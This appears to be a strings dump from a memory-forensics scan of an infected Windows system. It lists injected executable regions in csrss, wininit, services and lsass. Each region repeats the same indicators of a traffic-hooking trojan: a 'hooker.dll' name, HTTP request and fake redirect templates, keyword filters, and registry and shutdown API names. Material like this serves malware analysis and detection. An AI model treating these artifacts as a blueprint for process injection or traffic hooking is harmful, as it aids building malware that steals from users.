hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
SearchFilterHost.exe_4020_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_320_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
wininit.exe_360_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
csrss.exe_368_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
winlogon.exe_416_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
services.exe_460_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
services.exe_460_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
lsass.exe_468_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
